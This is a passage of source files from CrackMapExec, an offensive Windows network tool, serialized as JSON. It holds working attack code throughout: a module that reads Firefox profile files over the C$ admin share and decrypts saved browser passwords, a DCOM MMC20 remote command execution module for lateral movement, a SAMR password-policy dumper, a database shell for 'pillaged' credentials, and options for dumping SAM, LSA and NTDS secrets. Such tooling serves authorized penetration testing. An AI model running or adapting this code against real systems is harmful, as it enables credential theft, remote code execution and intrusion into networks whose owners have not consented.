self.db.get_credentials(cred_type=\"plaintext\")\n self.display_creds(creds)\n elif filter_term.split()[0].lower() == \"hash\":\n creds = self.db.get_credentials(cred_type=\"hash\")\n self.display_creds(creds)\n else:\n creds = self.db.get_credentials(filter_term=filter_term)\n if len(creds) != 1:\n self.display_creds(creds)\n elif len(creds) == 1:\n data = [\n [\n \"CredID\",\n \"CredType\",\n \"Pillaged From HostID\",\n \"Domain\",\n \"UserName\",\n \"Password\",\n ]\n ]\n cred_id_list = []\n\n for cred in creds:\n cred_id_list.append(cred[0])\n data.append([cred[0], cred[4], cred[5], cred[1], cred[2], cred[3]])\n\n print_table(data, title=\"Credential(s)\")\n\n data = [[\"GroupID\", \"Domain\", \"Name\"]]\n for cred_id in cred_id_list:\n links = self.db.get_group_relations(user_id=cred_id)\n\n for link in links:\n link_id, user_id, group_id = link\n groups = self.db.get_groups(group_id)\n\n for group in groups:\n group_id = group[0]\n domain = group[1]\n name = group[2]\n data.append([group_id, domain, name])\n\n print_table(data, title=\"Member of Group(s)\")\n\n data = [[\"HostID\", \"IP\", \"Hostname\", \"Domain\", \"OS\"]]\n for cred_id in cred_id_list:\n links = self.db.get_admin_relations(user_id=cred_id)\n\n for link in links:\n link_id, cred_id, host_id = link\n hosts = self.db.get_hosts(host_id)\n\n for host in hosts:\n data.append([host[0], host[1], host[2], host[3], host[4]])\n\n print_table(data, title=\"Admin Access to Host(s)\")\n\n def help_creds(self):\n help_string = \"\"\"\n creds [add|remove|plaintext|hash|filter_term]\n By default prints all creds\n Table format:\n | 'CredID', 'Admin On', 'CredType', 'Domain', 'UserName', 'Password' |\n Subcommands:\n add - format: \"add domain username password \"\n remove - format: \"remove \"\n plaintext - prints plaintext creds\n hash - prints hashed creds\n filter_term - filters creds with filter_term\n If a single credential is returned (e.g. `creds 15`, it prints the following tables:\n Credential(s) | 'CredID', 'CredType', 'Pillaged From HostID', 'Domain', 'UserName', 'Password' |\n Member of Group(s) | 'GroupID', 'Domain', 'Name' |\n Admin Access to Host(s) | 'HostID', 'IP', 'Hostname', 'Domain', 'OS'\n Otherwise, it prints the default credential table from a `like` query on the `username` column\n \"\"\"\n print_help(help_string)\n\n def do_clear_database(self, line):\n if input(\"This will destroy all data in the current database, are you SURE you\" \" want to run this? (y/n): \") == \"y\":\n self.db.clear_database()\n\n def help_clear_database(self):\n help_string = \"\"\"\n clear_database\n THIS COMPLETELY DESTROYS ALL DATA IN THE CURRENTLY CONNECTED DATABASE\n YOU CANNOT UNDO THIS COMMAND\n \"\"\"\n print_help(help_string)\n\n def complete_hosts(self, text, line):\n \"\"\"\n Tab-complete 'hosts' commands.\n \"\"\"\n commands = (\"add\", \"remove\", \"dc\")\n\n mline = line.partition(\" \")[2]\n offs = len(mline) - len(text)\n return [s[offs:] for s in commands if s.startswith(mline)]\n\n def complete_creds(self, text, line):\n \"\"\"\n Tab-complete 'creds' commands.\n \"\"\"\n commands = (\"add\", \"remove\", \"hash\", \"plaintext\")\n\n mline = line.partition(\" \")[2]\n offs = len(mline) - len(text)\n return [s[offs:] for s in commands if s.startswith(mline)]\n" }, { "path": "cme/protocols/smb/firefox.py", "content": "#!/usr/bin/env python3\nfrom base64 import b64decode\nfrom binascii import unhexlify\nfrom hashlib import pbkdf2_hmac, sha1\nimport hmac\nimport json\nimport ntpath\nimport sqlite3\nimport tempfile\nfrom Cryptodome.Cipher import AES, DES3\nfrom pyasn1.codec.der import decoder\nfrom dploot.lib.smb import DPLootSMBConnection\n\nCKA_ID = unhexlify(\"f8000000000000000000000000000001\")\n\n\nclass FirefoxData:\n def __init__(self, winuser: str, url: str, username: str, password: str):\n self.winuser = winuser\n self.url = url\n self.username = username\n self.password = password\n\n\nclass FirefoxTriage:\n \"\"\"\n Firefox by @zblurx\n Inspired by firefox looting from DonPAPI\n https://github.com/login-securite/DonPAPI\n \"\"\"\n\n firefox_generic_path = \"Users\\\\{}\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\"\n share = \"C$\"\n false_positive = (\n \".\",\n \"..\",\n \"desktop.ini\",\n \"Public\",\n \"Default\",\n \"Default User\",\n \"All Users\",\n )\n\n def __init__(self, target, logger, conn: DPLootSMBConnection = None):\n self.target = target\n self.logger = logger\n self.conn = conn\n\n def upgrade_connection(self, connection=None):\n self.conn = DPLootSMBConnection(self.target)\n if connection is not None:\n self.conn.smb_session = connection\n else:\n self.conn.connect()\n\n def run(self):\n if self.conn is None:\n self.upgrade_connection()\n\n firefox_data = []\n # list users\n users = self.get_users()\n for user in users:\n try:\n directories = self.conn.remote_list_dir(share=self.share, path=self.firefox_generic_path.format(user))\n except Exception as e:\n if \"STATUS_OBJECT_PATH_NOT_FOUND\" in str(e):\n continue\n self.logger.debug(e)\n if directories is None:\n continue\n for d in [d for d in directories if d.get_longname() not in self.false_positive and d.is_directory() > 0]:\n try:\n logins_path = self.firefox_generic_path.format(user) + \"\\\\\" + d.get_longname() + \"\\\\logins.json\"\n logins_data = self.conn.readFile(self.share, logins_path)\n if logins_data is None:\n continue # No logins.json file found\n logins = self.get_login_data(logins_data=logins_data)\n if len(logins) == 0:\n continue # No logins profile found\n key4_path = self.firefox_generic_path.format(user) + \"\\\\\" + d.get_longname() + \"\\\\key4.db\"\n key4_data = self.conn.readFile(self.share, key4_path, bypass_shared_violation=True)\n if key4_data is None:\n continue\n key = self.get_key(key4_data=key4_data)\n if key is None and self.target.password != \"\":\n key = self.get_key(\n key4_data=key4_data,\n master_password=self.target.password.encode(),\n )\n if key is None:\n continue\n for username, pwd, host in logins:\n decoded_username = self.decrypt(key=key, iv=username[1], ciphertext=username[2]).decode(\"utf-8\")\n password = self.decrypt(key=key, iv=pwd[1], ciphertext=pwd[2]).decode(\"utf-8\")\n if password is not None and decoded_username is not None:\n firefox_data.append(\n FirefoxData(\n winuser=user,\n url=host,\n username=decoded_username,\n password=password,\n )\n )\n except Exception as e:\n if \"STATUS_OBJECT_PATH_NOT_FOUND\" in str(e):\n continue\n self.logger.exception(e)\n return firefox_data\n\n def get_login_data(self, logins_data):\n json_logins = json.loads(logins_data)\n if \"logins\" not in json_logins:\n return [] # No logins key in logins.json file\n logins = [\n (\n self.decode_login_data(row[\"encryptedUsername\"]),\n self.decode_login_data(row[\"encryptedPassword\"]),\n row[\"hostname\"],\n )\n for row in json_logins[\"logins\"]\n ]\n return logins\n\n def get_key(self, key4_data, master_password=b\"\"):\n fh = tempfile.NamedTemporaryFile()\n fh.write(key4_data)\n fh.seek(0)\n db = sqlite3.connect(fh.name)\n cursor = db.cursor()\n cursor.execute(\"SELECT item1,item2 FROM metadata WHERE id = 'password';\")\n row = next(cursor)\n\n if row:\n global_salt, master_password, _ = self.is_master_password_correct(key_data=row, master_password=master_password)\n if global_salt:\n try:\n cursor.execute(\"SELECT a11,a102 FROM nssPrivate;\")\n for row in cursor:\n if row[0]:\n break\n a11 = row[0]\n a102 = row[1]\n if a102 == CKA_ID:\n decoded_a11 = decoder.decode(a11)\n key = self.decrypt_3des(decoded_a11, master_password, global_salt)\n if key is not None:\n fh.close()\n return key[:24]\n except Exception as e:\n self.logger.debug(e)\n fh.close()\n return b\"\"\n fh.close()\n\n def is_master_password_correct(self, key_data, master_password=b\"\"):\n try:\n entry_salt = b\"\"\n global_salt = key_data[0] # Item1\n item2 = key_data[1]\n decoded_item2 = decoder.decode(item2)\n cleartext_data = self.decrypt_3des(decoded_item2, master_password, global_salt)\n if cleartext_data != \"password-check\\x02\\x02\".encode():\n return \"\", \"\", \"\"\n return global_salt, master_password, entry_salt\n except Exception as e:\n self.logger.debug(e)\n return \"\", \"\", \"\"\n\n def get_users(self):\n users = list()\n\n users_dir_path = \"Users\\\\*\"\n directories = self.conn.listPath(shareName=self.share, path=ntpath.normpath(users_dir_path))\n\n for d in directories:\n if d.get_longname() not in self.false_positive and d.is_directory() > 0:\n users.append(d.get_longname())\n return users\n\n @staticmethod\n def decode_login_data(data):\n asn1data = decoder.decode(b64decode(data))\n return (\n asn1data[0][0].asOctets(),\n asn1data[0][1][1].asOctets(),\n asn1data[0][2].asOctets(),\n )\n\n @staticmethod\n def decrypt(key, iv, ciphertext):\n \"\"\"\n Decrypt ciphered data (user / password) using the key previously found\n \"\"\"\n cipher = DES3.new(key=key, mode=DES3.MODE_CBC, iv=iv)\n data = cipher.decrypt(ciphertext)\n nb = data[-1]\n try:\n return data[:-nb]\n except Exception:\n return data\n\n @staticmethod\n def decrypt_3des(decoded_item, master_password, global_salt):\n \"\"\"\n User master key is also encrypted (if provided, the master_password could be used to encrypt it)\n \"\"\"\n # See http://www.drh-consultancy.demon.co.uk/key3.html\n pbeAlgo = str(decoded_item[0][0][0])\n if pbeAlgo == \"1.2.840.113549.1.12.5.1.3\": # pbeWithSha1AndTripleDES-CBC\n entry_salt = decoded_item[0][0][1][0].asOctets()\n cipher_t = decoded_item[0][1].asOctets()\n\n # See http://www.drh-consultancy.demon.co.uk/key3.html\n hp = sha1(global_salt + master_password).digest()\n pes = entry_salt + \"\\x00\".encode() * (20 - len(entry_salt))\n chp = sha1(hp + entry_salt).digest()\n k1 = hmac.new(chp, pes + entry_salt, sha1).digest()\n tk = hmac.new(chp, pes, sha1).digest()\n k2 = hmac.new(chp, tk + entry_salt, sha1).digest()\n k = k1 + k2\n iv = k[-8:]\n key = k[:24]\n cipher = DES3.new(key=key, mode=DES3.MODE_CBC, iv=iv)\n return cipher.decrypt(cipher_t)\n elif pbeAlgo == \"1.2.840.113549.1.5.13\": # pkcs5 pbes2\n assert str(decoded_item[0][0][1][0][0]) == \"1.2.840.113549.1.5.12\"\n assert str(decoded_item[0][0][1][0][1][3][0]) == \"1.2.840.113549.2.9\"\n assert str(decoded_item[0][0][1][1][0]) == \"2.16.840.1.101.3.4.1.42\"\n # https://tools.ietf.org/html/rfc8018#page-23\n entry_salt = decoded_item[0][0][1][0][1][0].asOctets()\n iteration_count = int(decoded_item[0][0][1][0][1][1])\n key_length = int(decoded_item[0][0][1][0][1][2])\n assert key_length == 32\n\n k = sha1(global_salt + master_password).digest()\n key = pbkdf2_hmac(\"sha256\", k, entry_salt, iteration_count, dklen=key_length)\n\n # https://hg.mozilla.org/projects/nss/rev/fc636973ad06392d11597620b602779b4af312f6#l6.49\n iv = b\"\\x04\\x0e\" + decoded_item[0][0][1][1][1].asOctets()\n # 04 is OCTETSTRING, 0x0e is length == 14\n encrypted_value = decoded_item[0][1].asOctets()\n cipher = AES.new(key, AES.MODE_CBC, iv)\n decrypted = cipher.decrypt(encrypted_value)\n if decrypted is not None:\n return decrypted\n else:\n return None\n" }, { "path": "cme/protocols/smb/mmcexec.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Copyright (c) 2003-2016 CORE Security Technologies\n#\n# This software is provided under under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# A similar approach to wmiexec but executing commands through MMC.\n# Main advantage here is it runs under the user (has to be Admin)\n# account, not SYSTEM, plus, it doesn't generate noisy messages\n# in the event log that smbexec.py does when creating a service.\n# Drawback is it needs DCOM, hence, I have to be able to access\n# DCOM ports at the target machine.\n#\n# Original discovery by Matt Nelson (@enigma0x3):\n# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/\n#\n# Author:\n# beto (@agsolino)\n#\n# Reference for:\n# DCOM\n#\n# ToDo:\n# [ ] Kerberos auth not working, invalid_checksum is thrown. Most probably sequence numbers out of sync due to\n# getInterface() method\n#\n\nfrom os.path import join as path_join\nfrom time import sleep\nfrom cme.connection import dcom_FirewallChecker\nfrom cme.helpers.misc import gen_random_string\n\nfrom impacket.dcerpc.v5.dcom.oaut import (\n IID_IDispatch,\n string_to_bin,\n IDispatch,\n DISPPARAMS,\n DISPATCH_PROPERTYGET,\n VARIANT,\n VARENUM,\n DISPATCH_METHOD,\n)\nfrom impacket.dcerpc.v5.dcomrt import DCOMConnection\nfrom impacket.dcerpc.v5.dcomrt import (\n OBJREF,\n FLAGS_OBJREF_CUSTOM,\n OBJREF_CUSTOM,\n OBJREF_HANDLER,\n OBJREF_EXTENDED,\n OBJREF_STANDARD,\n FLAGS_OBJREF_HANDLER,\n FLAGS_OBJREF_STANDARD,\n FLAGS_OBJREF_EXTENDED,\n IRemUnknown2,\n INTERFACE,\n)\nfrom impacket.dcerpc.v5.dtypes import NULL\n\n\nclass MMCEXEC:\n def __init__(self, host, share_name, username, password, domain, smbconnection, share, hashes=None, logger=None, tries=None, timeout=None):\n self.__host = host\n self.__username = username\n self.__password = password\n self.__smbconnection = smbconnection\n self.__domain = domain\n self.__lmhash = \"\"\n self.__nthash = \"\"\n self.__share_name = share_name\n self.__output = None\n self.__outputBuffer = b\"\"\n self.__shell = \"c:\\\\windows\\\\system32\\\\cmd.exe\"\n self.__pwd = \"C:\\\\\"\n self.__quit = None\n self.__executeShellCommand = None\n self.__retOutput = True\n self.__share = share\n self.__dcom = None\n self.__tries = tries\n self.__timeout = timeout\n self.logger = logger\n\n if hashes is not None:\n if hashes.find(\":\") != -1:\n self.__lmhash, self.__nthash = hashes.split(\":\")\n else:\n self.__nthash = hashes\n\n self.__dcom = DCOMConnection(\n self.__host,\n self.__username,\n self.__password,\n self.__domain,\n self.__lmhash,\n self.__nthash,\n None,\n oxidResolver=True,\n )\n try:\n iInterface = self.__dcom.CoCreateInstanceEx(string_to_bin(\"49B2791A-B1AE-4C90-9B8E-E860BA07F889\"), IID_IDispatch)\n except:\n # Make it force break function\n self.__dcom.disconnect()\n flag, self.__stringBinding = dcom_FirewallChecker(iInterface, self.__timeout)\n if not flag or not self.__stringBinding:\n error_msg = f'MMCEXEC: Dcom initialization failed on connection with stringbinding: \"{self.__stringBinding}\", please increase the timeout with the option \"--dcom-timeout\". If it\\'s still failing maybe something is blocking the RPC connection, try another exec method'\n \n if not self.__stringBinding:\n error_msg = \"MMCEXEC: Dcom initialization failed: can't get target stringbinding, maybe cause by IPv6 or any other issues, please check your target again\"\n \n self.logger.fail(error_msg) if not flag else self.logger.debug(error_msg)\n # Make it force break function\n self.__dcom.disconnect()\n iMMC = IDispatch(iInterface)\n\n resp = iMMC.GetIDsOfNames((\"Document\",))\n\n dispParams = DISPPARAMS(None, False)\n dispParams[\"rgvarg\"] = NULL\n dispParams[\"rgdispidNamedArgs\"] = NULL\n dispParams[\"cArgs\"] = 0\n dispParams[\"cNamedArgs\"] = 0\n resp = iMMC.Invoke(resp[0], 0x409, DISPATCH_PROPERTYGET, dispParams, 0, [], [])\n\n iDocument = IDispatch(self.getInterface(iMMC, resp[\"pVarResult\"][\"_varUnion\"][\"pdispVal\"][\"abData\"]))\n resp = iDocument.GetIDsOfNames((\"ActiveView\",))\n resp = iDocument.Invoke(resp[0], 0x409, DISPATCH_PROPERTYGET, dispParams, 0, [], [])\n\n iActiveView = IDispatch(self.getInterface(iMMC, resp[\"pVarResult\"][\"_varUnion\"][\"pdispVal\"][\"abData\"]))\n pExecuteShellCommand = iActiveView.GetIDsOfNames((\"ExecuteShellCommand\",))[0]\n\n pQuit = iMMC.GetIDsOfNames((\"Quit\",))[0]\n\n self.__quit = (iMMC, pQuit)\n self.__executeShellCommand = (iActiveView, pExecuteShellCommand)\n\n def getInterface(self, interface, resp):\n # Now let's parse the answer and build an Interface instance\n objRefType = OBJREF(b\"\".join(resp))[\"flags\"]\n objRef = None\n if objRefType == FLAGS_OBJREF_CUSTOM:\n objRef = OBJREF_CUSTOM(b\"\".join(resp))\n elif objRefType == FLAGS_OBJREF_HANDLER:\n objRef = OBJREF_HANDLER(b\"\".join(resp))\n elif objRefType == FLAGS_OBJREF_STANDARD:\n objRef = OBJREF_STANDARD(b\"\".join(resp))\n elif objRefType == FLAGS_OBJREF_EXTENDED:\n objRef = OBJREF_EXTENDED(b\"\".join(resp))\n else:\n self.logger.fail(\"Unknown OBJREF Type! 0x%x\" % objRefType)\n\n return IRemUnknown2(\n INTERFACE(\n interface.get_cinstance(),\n None,\n interface.get_ipidRemUnknown(),\n objRef[\"std\"][\"ipid\"],\n oxid=objRef[\"std\"][\"oxid\"],\n oid=objRef[\"std\"][\"oxid\"],\n target=interface.get_target(),\n )\n )\n\n def execute(self, command, output=False):\n self.__retOutput = output\n self.execute_remote(command)\n self.exit()\n self.__dcom.disconnect()\n return self.__outputBuffer\n\n def exit(self):\n try:\n dispParams = DISPPARAMS(None, False)\n dispParams[\"rgvarg\"] = NULL\n dispParams[\"rgdispidNamedArgs\"] = NULL\n dispParams[\"cArgs\"] = 0\n dispParams[\"cNamedArgs\"] = 0\n\n self.__quit[0].Invoke(self.__quit[1], 0x409, DISPATCH_METHOD, dispParams, 0, [], [])\n except Exception as e:\n self.logger.fail(f\"Unexpect dcom error when doing exit() function in mmcexec: {str(e)}\")\n return True\n\n def execute_remote(self, data):\n self.__output = \"\\\\Windows\\\\Temp\\\\\" + gen_random_string(6)\n\n command = self.__shell + \" /Q /c \" + data\n if self.__retOutput is True:\n command += \" 1> \" + f\"{self.__output}\" + \" 2>&1\"\n\n dispParams = DISPPARAMS(None, False)\n dispParams[\"rgdispidNamedArgs\"] = NULL\n dispParams[\"cArgs\"] = 4\n dispParams[\"cNamedArgs\"] = 0\n arg0 = VARIANT(None, False)\n arg0[\"clSize\"] = 5\n arg0[\"vt\"] = VARENUM.VT_BSTR\n arg0[\"_varUnion\"][\"tag\"] = VARENUM.VT_BSTR\n arg0[\"_varUnion\"][\"bstrVal\"][\"asData\"] = self.__shell\n\n arg1 = VARIANT(None, False)\n arg1[\"clSize\"] = 5\n arg1[\"vt\"] = VARENUM.VT_BSTR\n arg1[\"_varUnion\"][\"tag\"] = VARENUM.VT_BSTR\n arg1[\"_varUnion\"][\"bstrVal\"][\"asData\"] = self.__pwd\n\n arg2 = VARIANT(None, False)\n arg2[\"clSize\"] = 5\n arg2[\"vt\"] = VARENUM.VT_BSTR\n arg2[\"_varUnion\"][\"tag\"] = VARENUM.VT_BSTR\n arg2[\"_varUnion\"][\"bstrVal\"][\"asData\"] = command\n\n arg3 = VARIANT(None, False)\n arg3[\"clSize\"] = 5\n arg3[\"vt\"] = VARENUM.VT_BSTR\n arg3[\"_varUnion\"][\"tag\"] = VARENUM.VT_BSTR\n arg3[\"_varUnion\"][\"bstrVal\"][\"asData\"] = \"7\"\n dispParams[\"rgvarg\"].append(arg3)\n dispParams[\"rgvarg\"].append(arg2)\n dispParams[\"rgvarg\"].append(arg1)\n dispParams[\"rgvarg\"].append(arg0)\n\n self.__executeShellCommand[0].Invoke(self.__executeShellCommand[1], 0x409, DISPATCH_METHOD, dispParams, 0, [], [])\n self.get_output_remote()\n\n def output_callback(self, data):\n self.__outputBuffer += data\n\n def get_output_fileless(self):\n if not self.__retOutput:\n return\n\n while True:\n try:\n with open(path_join(\"/tmp\", \"cme_hosted\", self.__output), \"r\") as output:\n self.output_callback(output.read())\n break\n except IOError:\n sleep(2)\n\n def get_output_remote(self):\n if self.__retOutput is False:\n self.__outputBuffer = \"\"\n return\n tries = 1\n while True:\n try:\n self.logger.info(f\"Attempting to read {self.__share}\\\\{self.__output}\")\n self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)\n break\n except Exception as e:\n if tries >= self.__tries:\n self.logger.fail(f'MMCEXEC: Get output file error, maybe got detected by AV software, please increase the number of tries with the option \"--get-output-tries\". If it\\'s still failing maybe something is blocking the schedule job, try another exec method')\n break\n if str(e).find(\"STATUS_BAD_NETWORK_NAME\") >0 :\n self.logger.fail(f'MMCEXEC: Get ouput failed, target has blocked {self.__share} access (maybe command executed!)')\n break\n if str(e).find(\"STATUS_SHARING_VIOLATION\") >= 0 or str(e).find(\"STATUS_OBJECT_NAME_NOT_FOUND\") >= 0:\n # Output not finished, let's wait\n sleep(2)\n tries += 1\n else:\n self.logger.debug(str(e))\n \n if self.__outputBuffer:\n self.logger.debug(f\"Deleting file {self.__share}\\\\{self.__output}\")\n self.__smbconnection.deleteFile(self.__share, self.__output)" }, { "path": "cme/protocols/smb/passpol.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Stolen from https://github.com/Wh1t3Fox/polenum\n\nfrom impacket.dcerpc.v5.rpcrt import DCERPC_v5\nfrom impacket.dcerpc.v5 import transport, samr\nfrom time import strftime, gmtime\nfrom cme.logger import cme_logger\n\n\ndef d2b(a):\n tbin = []\n while a:\n tbin.append(a % 2)\n a //= 2\n\n t2bin = tbin[::-1]\n if len(t2bin) != 8:\n for x in range(6 - len(t2bin)):\n t2bin.insert(0, 0)\n return \"\".join([str(g) for g in t2bin])\n\n\ndef convert(low, high, lockout=False):\n time = \"\"\n tmp = 0\n\n if low == 0 and hex(high) == \"-0x80000000\":\n return \"Not Set\"\n if low == 0 and high == 0:\n return \"None\"\n\n if not lockout:\n if low != 0:\n high = abs(high + 1)\n else:\n high = abs(high)\n low = abs(low)\n\n tmp = low + (high) * 16**8 # convert to 64bit int\n tmp *= 1e-7 # convert to seconds\n else:\n tmp = abs(high) * (1e-7)\n\n try:\n minutes = int(strftime(\"%M\", gmtime(tmp)))\n hours = int(strftime(\"%H\", gmtime(tmp)))\n days = int(strftime(\"%j\", gmtime(tmp))) - 1\n except ValueError as e:\n return \"[-] Invalid TIME\"\n\n if days > 1:\n time += f\"{days} days \"\n elif days == 1:\n time += f\"{days} day \"\n if hours > 1:\n time += f\"{hours} hours \"\n elif hours == 1:\n time += f\"{hours} hour \"\n if minutes > 1:\n time += f\"{minutes} minutes \"\n elif minutes == 1:\n time += f\"{minutes} minute \"\n return time\n\n\nclass PassPolDump:\n KNOWN_PROTOCOLS = {\n \"139/SMB\": (r\"ncacn_np:%s[\\pipe\\samr]\", 139),\n \"445/SMB\": (r\"ncacn_np:%s[\\pipe\\samr]\", 445),\n }\n\n def __init__(self, connection):\n self.logger = connection.logger\n self.addr = connection.host if not connection.kerberos else connection.hostname + \".\" + connection.domain\n self.protocol = connection.args.port\n self.username = connection.username\n self.password = connection.password\n self.domain = connection.domain\n self.hash = connection.hash\n self.lmhash = \"\"\n self.nthash = \"\"\n self.aesKey = connection.aesKey\n self.doKerberos = connection.kerberos\n self.protocols = PassPolDump.KNOWN_PROTOCOLS.keys()\n self.pass_pol = {}\n\n if self.hash is not None:\n if self.hash.find(\":\") != -1:\n self.lmhash, self.nthash = self.hash.split(\":\")\n else:\n self.nthash = self.hash\n\n if self.password is None:\n self.password = \"\"\n\n def dump(self):\n # Try all requested protocols until one works.\n for protocol in self.protocols:\n try:\n protodef = PassPolDump.KNOWN_PROTOCOLS[protocol]\n port = protodef[1]\n except KeyError:\n cme_logger.debug(f\"Invalid Protocol '{protocol}'\")\n cme_logger.debug(f\"Trying protocol {protocol}\")\n rpctransport = transport.SMBTransport(\n self.addr,\n port,\n r\"\\samr\",\n self.username,\n self.password,\n self.domain,\n self.lmhash,\n self.nthash,\n self.aesKey,\n doKerberos=self.doKerberos,\n )\n try:\n self.fetchList(rpctransport)\n except Exception as e:\n cme_logger.debug(f\"Protocol failed: {e}\")\n else:\n # Got a response. No need for further iterations.\n self.pretty_print()\n break\n\n return self.pass_pol\n\n def fetchList(self, rpctransport):\n dce = DCERPC_v5(rpctransport)\n dce.connect()\n dce.bind(samr.MSRPC_UUID_SAMR)\n\n # Setup Connection\n resp = samr.hSamrConnect2(dce)\n if resp[\"ErrorCode\"] != 0:\n raise Exception(\"Connect error\")\n\n resp2 = samr.hSamrEnumerateDomainsInSamServer(\n dce,\n serverHandle=resp[\"ServerHandle\"],\n enumerationContext=0,\n preferedMaximumLength=500,\n )\n if resp2[\"ErrorCode\"] != 0:\n raise Exception(\"Connect error\")\n\n resp3 = samr.hSamrLookupDomainInSamServer(\n dce,\n serverHandle=resp[\"ServerHandle\"],\n name=resp2[\"Buffer\"][\"Buffer\"][0][\"Name\"],\n )\n if resp3[\"ErrorCode\"] != 0:\n raise Exception(\"Connect error\")\n\n resp4 = samr.hSamrOpenDomain(\n dce,\n serverHandle=resp[\"ServerHandle\"],\n desiredAccess=samr.MAXIMUM_ALLOWED,\n domainId=resp3[\"DomainId\"],\n )\n if resp4[\"ErrorCode\"] != 0:\n raise Exception(\"Connect error\")\n\n self.__domains = resp2[\"Buffer\"][\"Buffer\"]\n domainHandle = resp4[\"DomainHandle\"]\n # End Setup\n\n re = samr.hSamrQueryInformationDomain2(\n dce,\n domainHandle=domainHandle,\n domainInformationClass=samr.DOMAIN_INFORMATION_CLASS.DomainPasswordInformation,\n )\n self.__min_pass_len = re[\"Buffer\"][\"Password\"][\"MinPasswordLength\"] or \"None\"\n self.__pass_hist_len = re[\"Buffer\"][\"Password\"][\"PasswordHistoryLength\"] or \"None\"\n self.__max_pass_age = convert(\n int(re[\"Buffer\"][\"Password\"][\"MaxPasswordAge\"][\"LowPart\"]),\n int(re[\"Buffer\"][\"Password\"][\"MaxPasswordAge\"][\"HighPart\"]),\n )\n self.__min_pass_age = convert(\n int(re[\"Buffer\"][\"Password\"][\"MinPasswordAge\"][\"LowPart\"]),\n int(re[\"Buffer\"][\"Password\"][\"MinPasswordAge\"][\"HighPart\"]),\n )\n self.__pass_prop = d2b(re[\"Buffer\"][\"Password\"][\"PasswordProperties\"])\n\n re = samr.hSamrQueryInformationDomain2(\n dce,\n domainHandle=domainHandle,\n domainInformationClass=samr.DOMAIN_INFORMATION_CLASS.DomainLockoutInformation,\n )\n self.__rst_accnt_lock_counter = convert(0, re[\"Buffer\"][\"Lockout\"][\"LockoutObservationWindow\"], lockout=True)\n self.__lock_accnt_dur = convert(0, re[\"Buffer\"][\"Lockout\"][\"LockoutDuration\"], lockout=True)\n self.__accnt_lock_thres = re[\"Buffer\"][\"Lockout\"][\"LockoutThreshold\"] or \"None\"\n\n re = samr.hSamrQueryInformationDomain2(\n dce,\n domainHandle=domainHandle,\n domainInformationClass=samr.DOMAIN_INFORMATION_CLASS.DomainLogoffInformation,\n )\n self.__force_logoff_time = convert(\n re[\"Buffer\"][\"Logoff\"][\"ForceLogoff\"][\"LowPart\"],\n re[\"Buffer\"][\"Logoff\"][\"ForceLogoff\"][\"HighPart\"],\n )\n\n self.pass_pol = {\n \"min_pass_len\": self.__min_pass_len,\n \"pass_hist_len\": self.__pass_hist_len,\n \"max_pass_age\": self.__max_pass_age,\n \"min_pass_age\": self.__min_pass_age,\n \"pass_prop\": self.__pass_prop,\n \"rst_accnt_lock_counter\": self.__rst_accnt_lock_counter,\n \"lock_accnt_dur\": self.__lock_accnt_dur,\n \"accnt_lock_thres\": self.__accnt_lock_thres,\n \"force_logoff_time\": self.__force_logoff_time,\n }\n\n dce.disconnect()\n\n def pretty_print(self):\n PASSCOMPLEX = {\n 5: \"Domain Password Complex:\",\n 4: \"Domain Password No Anon Change:\",\n 3: \"Domain Password No Clear Change:\",\n 2: \"Domain Password Lockout Admins:\",\n 1: \"Domain Password Store Cleartext:\",\n 0: \"Domain Refuse Password Change:\",\n }\n\n cme_logger.debug(\"Found domain(s):\")\n for domain in self.__domains:\n cme_logger.debug(f\"{domain['Name']}\")\n\n self.logger.success(f\"Dumping password info for domain: {self.__domains[0]['Name']}\")\n\n self.logger.highlight(f\"Minimum password length: {self.__min_pass_len}\")\n self.logger.highlight(f\"Password history length: {self.__pass_hist_len}\")\n self.logger.highlight(f\"Maximum password age: {self.__max_pass_age}\")\n self.logger.highlight(\"\")\n self.logger.highlight(f\"Password Complexity Flags: {self.__pass_prop or 'None'}\")\n\n for i, a in enumerate(self.__pass_prop):\n self.logger.highlight(f\"\\t{PASSCOMPLEX[i]} {str(a)}\")\n\n self.logger.highlight(\"\")\n self.logger.highlight(f\"Minimum password age: {self.__min_pass_age}\")\n self.logger.highlight(f\"Reset Account Lockout Counter: {self.__rst_accnt_lock_counter}\")\n self.logger.highlight(f\"Locked Account Duration: {self.__lock_accnt_dur}\")\n self.logger.highlight(f\"Account Lockout Threshold: {self.__accnt_lock_thres}\")\n self.logger.highlight(f\"Forced Log off Time: {self.__force_logoff_time}\")\n" }, { "path": "cme/protocols/smb/proto_args.py", "content": "def proto_args(parser, std_parser, module_parser):\n smb_parser = parser.add_parser(\"smb\", help=\"own stuff using SMB\", parents=[std_parser, module_parser])\n smb_parser.add_argument(\"-H\", \"--hash\", metavar=\"HASH\", dest=\"hash\", nargs=\"+\", default=[],\n help=\"NTLM hash(es) or file(s) containing NTLM hashes\")\n dgroup = smb_parser.add_mutually_exclusive_group()\n dgroup.add_argument(\"-d\", metavar=\"DOMAIN\", dest=\"domain\", type=str, help=\"domain to authenticate to\")\n dgroup.add_argument(\"--local-auth\", action=\"store_true\", help=\"authenticate locally to each target\")\n smb_parser.add_argument(\"--port\", type=int, choices={445, 139}, default=445, help=\"SMB port (default: 445)\")\n smb_parser.add_argument(\"--share\", metavar=\"SHARE\", default=\"C$\", help=\"specify a share (default: C$)\")\n smb_parser.add_argument(\"--smb-server-port\", default=\"445\", help=\"specify a server port for SMB\", type=int)\n smb_parser.add_argument(\"--gen-relay-list\", metavar=\"OUTPUT_FILE\",\n help=\"outputs all hosts that don't require SMB signing to the specified file\")\n smb_parser.add_argument(\"--smb-timeout\", help=\"SMB connection timeout, default 2 secondes\", type=int, default=2)\n smb_parser.add_argument(\"--laps\", dest=\"laps\", metavar=\"LAPS\", type=str, help=\"LAPS authentification\",\n nargs=\"?\", const=\"administrator\")\n\n cgroup = smb_parser.add_argument_group(\"Credential Gathering\", \"Options for gathering credentials\")\n cgroup.add_argument(\"--sam\", action=\"store_true\", help=\"dump SAM hashes from target systems\")\n cgroup.add_argument(\"--lsa\", action=\"store_true\", help=\"dump LSA secrets from target systems\")\n cgroup.add_argument(\"--ntds\", choices={\"vss\", \"drsuapi\"}, nargs=\"?\", const=\"drsuapi\",\n help=\"dump the NTDS.dit from target DCs using the 